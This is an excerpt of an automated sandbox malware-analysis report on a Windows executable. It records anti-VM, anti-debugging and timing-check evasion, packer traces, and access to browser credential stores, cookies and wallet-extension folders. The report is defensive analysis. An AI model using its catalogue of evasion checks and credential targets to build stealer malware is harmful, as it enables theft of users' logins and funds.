    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0BE3 second address: 4EF0BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0BE7 second address: 4EF0BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0BEB second address: 4EF0BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov eax, 668202A1h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0BFD second address: 4EF0C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 jmp 00007F30F50FDE36h 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 jmp 00007F30F50FDE30h 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c mov si, 8D29h 0x00000020 popad 0x00000021 je 00007F3165DEB5A3h 0x00000027 pushad 0x00000028 call 00007F30F50FDE32h 0x0000002d mov cx, 7BD1h 0x00000031 pop eax 0x00000032 movsx ebx, si 0x00000035 popad 0x00000036 cmp dword ptr [75C4459Ch], 05h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0C69 second address: 4EF0C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0C6F second address: 4EF0CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F3165E03640h 0x0000000f jmp 00007F30F50FDE30h 0x00000014 xchg eax, esi 0x00000015 jmp 00007F30F50FDE30h 0x0000001a push eax 0x0000001b jmp 00007F30F50FDE2Bh 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bx, FBA6h 0x00000028 movsx ebx, si 0x0000002b popad 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0D25 second address: 4EF0D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0D2B second address: 4EF0DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F30F50FDE34h 0x00000013 xor ecx, 53A54398h 0x00000019 jmp 00007F30F50FDE2Bh 0x0000001e popfd 0x0000001f jmp 00007F30F50FDE38h 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F30F50FDE2Dh 0x0000002f sbb ax, 83E6h 0x00000034 jmp 00007F30F50FDE31h 0x00000039 popfd 0x0000003a mov si, EE17h 0x0000003e popad 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSpecial instruction interceptor: First address: F15C9B instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSpecial instruction interceptor: First address: F15D6D instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSpecial instruction interceptor: First address: 10E37B2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe TID: 7760Thread sleep time: -30015s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe TID: 7744Thread sleep time: -38019s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe TID: 8116Thread sleep time: -180000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629729002.000000000109A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: ASIr1Bo2x9.exe, ASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1299881367.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D59000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629729002.000000000109A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: SICE
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeProcess queried: DebugPortJump to behavior
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629916958.00000000010E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: BProgram Manager
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: ASIr1Bo2x9.exe, ASIr1Bo2x9.exe, 00000000.00000003.1390007409.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392566112.00000000058E5000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1388880431.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385574336.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1632008353.00000000058E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
